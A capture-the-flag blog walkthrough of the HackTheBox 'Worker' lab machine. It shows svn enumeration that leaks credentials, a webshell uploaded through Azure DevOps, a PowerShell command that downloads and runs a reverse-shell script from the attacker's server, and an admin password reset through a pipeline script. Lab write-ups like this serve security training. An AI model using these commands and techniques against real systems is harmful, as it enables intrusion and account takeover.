Worker HackTheBox WalkThrough

Worker HackTheBox WalkThrough

This is Worker HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Worker HTB box. Before starting let us know something about this box. It is a windows box with IP address 10.10.10.203 and difficulty medium assigned by it’s maker.

Before starting, first connect your PC with VPN and make sure your connectivity by pinging the IP 10.10.10.203. If all goes correct then it is time to start hacking.

As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. Nmap (port scanner) gave the following result:-

Scanning

$ nmap -sC -sV -T4 -oN worker_scan 10.10.10.203

Nmap port scan during Worker HackTheBox WalkThrough

Nmap discovered that port 80 and 3690 are open. Microsoft IIS web server is running over port 80 and svnserve service is running over port 3690. Ongoing to URL http://10.10.10.203/ found default web page of Microsoft IIS server. Tried to explore the source-page if, this website has any hyperlink of other pages. However, got nothing interesting except Microsoft official page link. So left it there and tried to move forward to enumerate on port 3690.

Didn’t know anything about svnserve service but after some googling found this interesting article. It explains about a tool svn that is used to remotely access svn server. After playing for sometimes with this tool got a subdomain dimension.worker.htb and a file deploy.ps1.

$ svn list --verbose -r 2 svn://10.10.10.203/

Listing the content of svn directory in Worker HackTheBox WalkThrough

After some, more enumeration got a way to dump the content of the file deploy.ps1.

$ svn diff -r 2 svn://10.10.10.203/

Listing the content of deploy.ps1 folder during Worker HackTheBox WalkThrough

Got some credential nathen : wendel98 and a new subdomain devops.worker.htb. Did not know whose credential is it but as usual added it to my notes. It may be helpful further. Now we have two subdomains dimension.worker.htb and devops.worker.htb. Added both these subdomains to my hosts file.

Modified Hosts File

$ cat /etc/hosts

My host file looks after modification

Ongoing to http://dimension.worker.htb/#work got some more subdomains, which is alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb. Added them all to my hosts file. So my final hosts file looks something like below.

Modified Hosts File

$cat /etc/hosts

Host Files looks after modification

Ongoing to subdomains alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb got nothing interesting on all these pages. So left them there and ongoing to http://devops.worker.htb got a login page like, we have in tomcat web server. Tried to login with the credential nathen:wendel98 and successfully logged in.

Login into devops.worker.htb domain during Worker HackTheBox WalkThrough

Upon login, find that it is Microsoft Azure DevOps platform. For more information about Microsoft Azure, you can watch this video. This is a Cloud based Service which gives us facility to create and deploy our custom package by directly uploading them on the server.

We will take advantage of it’s this feature of uploading and deploying any package. We will upload our command shell and deploy them in a branch created by us.

Therefore, to get a shell on my PC I followed the given steps.

1. Created a Branch named MyBranch1 in Repos.

2. Uploaded cmdasp.aspx command shell in spectral folder inside the branch MyBranch1

The command shell can be found at directory /usr/share/webshells/aspx/ in Kali Linux.

3. Then performed Commit, Pull and finally Approved it respectively.

Once our package is approved, it can be accessed at http://spectral.worker.htb/aspcmd.aspx .

Since we will upload our command shell in spectral directory that is why it will be accessed at subdomain spectral.worker.htb. Had we used some other folder like lens to upload our shell then it would be accessed at the subdomain lens.worker.htb.

I exactly did the same steps as described above.

Uploading & Deploying Package

1. Login to the DevOps using the credential nathen : wendel98

2. Click on SmartHotel360.

Selecting SmartHotel360 to list it content in Worker HackTheBox WalkThrough

3. On the left pan of the window click on Braches option under repos menu and click on the New Branch to create a new branch.

Selecting branch to create new branch in Worker HackTheBox WalkThrough

4. Providing the Name as MyBranch1 and then Create branch.

Naming the branch to MyBranch1 in Worker HackTheBox WalkThrough

5. Once branch is created click it to open all the files inside the branch.

Selecting the Branch

6. Upload the cmdasp.aspx command shell by choosing Upload files and click on commit button to commit the upload.

Selecting Upload to upload our aspx command shell in Worker HackTheBox WalkThrough

7. Once we have commited successfully click Create a pull request to pull the commit.

Creating pool requests in Worker HackTheBox WalkThrough

8. Enter the name of the Title to Anything and choose the Reviewers to Nathalie Henley. In addition, choose Work Items to any from the two, which you want and click on Create.

Giving title to the new Pull Requests in HackTheBox Worker Writeup

9. Click on Approve, Complete and then Complete Merge. Before clicking on Complete Merge make sure to uncheck the 2nd option Delete MyBranch1 after merging.

Window showing approval button in Worker HackTheBox WalkThrough

After Complete Merge you will get the following message.

Worker screen after deploying the aspx shell in hackthebox walkthrough

Now all set. Just go to the URL http://spectral.worker.htb/cmdasp.aspx  to access the command shell and confirm the host by executing whoami && ipconfig.

Command shell got from by accessing the uploaded shell through URL and checking the host

Now we have remote command execution. It is time to get a reverse shell on our Terminal. There are multiple ways to get shell. I have used Invoke-PowerShellTcp.ps1 from here.

Getting Shell through RCE

To get a shell I did the following things

1. Downloaded the shell from above URL

2. Changed the IP address and port number inside Invoke-PowerShellTcp.ps1 file to my tun0 IP

3. Started netcat listener locally

4. Started Python HTTP web server locally

5. And executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx

$ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"

Note: Try to refresh the page http://spectral.worker.htb/cmdasp.aspx  for 4 to 5 times if you don’t get a command shell because it may takes some times to be deployed.

Getting User shell on terminal by command execution in Worker HackTheBox WalkThrough

We got a shell. After some initial enumeration found a drive W on worker machine and inside the directory W:\svnrepos\www\conf\ a file named passwd. It contains all the svn user credential. And also the credential of the user robisl which is present in the C:\Users\ directory. The credential is robisl:wolves11

List of password file discovered in W drive during Worker HackTheBox WalkThrough

Tried to login remotely with the credential robisl:wolves11 using evil-winrm (A windows remote Management tool). And, successfully logged in.

Login using Evil-Winrm

$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Login into Worker HackTheBox machine using evil-winrm tool

Capture User Flag

$ type ..\Desktop\user.txt

Worker HackTheBox User Flag captured during walkthrough

Privilege Escalation

To escalate privilege I did the following things

1. Logged in to devops.worker.htb using the creads robisl : wolves11

2. Created a pipeline

3. Then choosed “Azure Repos Git” for importing code

4. Clicked Repository PrtsUnlimited, then chose starter pipeline as platform

5. Finally introduced custom command inside the script to change admin password and at last save & run the script to execute command. 

Following above steps

Creating Pipeline & Running Script

1. Click on PartsUnlimited

Selecting PartsUnlimited to list it's content in Worker Hackthebox

2. On, the left pane click on the option Pipelines.

Selecting Pipeline to list its content

3. Then New pipeline

Creating New Pipeline in Worker machine to perform privilege escalation

4. Choose Azure Repos Git

Selecting the source to obtain code for execution in Worker HackTheBox WalkThrough

5. Click on PartsUnlimited

Select the repository PrtsUnlimited

6. Select the platform to Starter pipeline

Selecting the Starter Pipeline platform to execute our command

7. Edit the code by adding net user administrator ThisIsNewPASSWD@123. Click save and run. The cmd command which we have introduced into our azure-pipelines.yml file will change the administrator password to ThisIsNewPASSWD@123.

Editing the script to introduce our custom cmd command in YAML file

8. Type the name to MyPipeline in review dialog box. Then save and run.

Save and Run

After successful run, you will have the following window.

Finalizing the Setup of CL wit Azure Pipeline

Our administrator password is changed. We can now login remotely to the worker machine using evil-winrm with the credential administrator: ThisIsNewPASSWD@123

$ evil-winrm -i 10.10.10.203 -u administrator -p ThisIsNewPASSWD@123

Login remotely to administrator account using Evil-Winrm tool

Capture Root Flag

$ type ..\Desktop\root.txt

Worker HackTheBox machine root flag captured during walkthrough

This is how I rooted to Worker HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].

For more hackthebox walkthrough always visit ethicalhacs.com.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/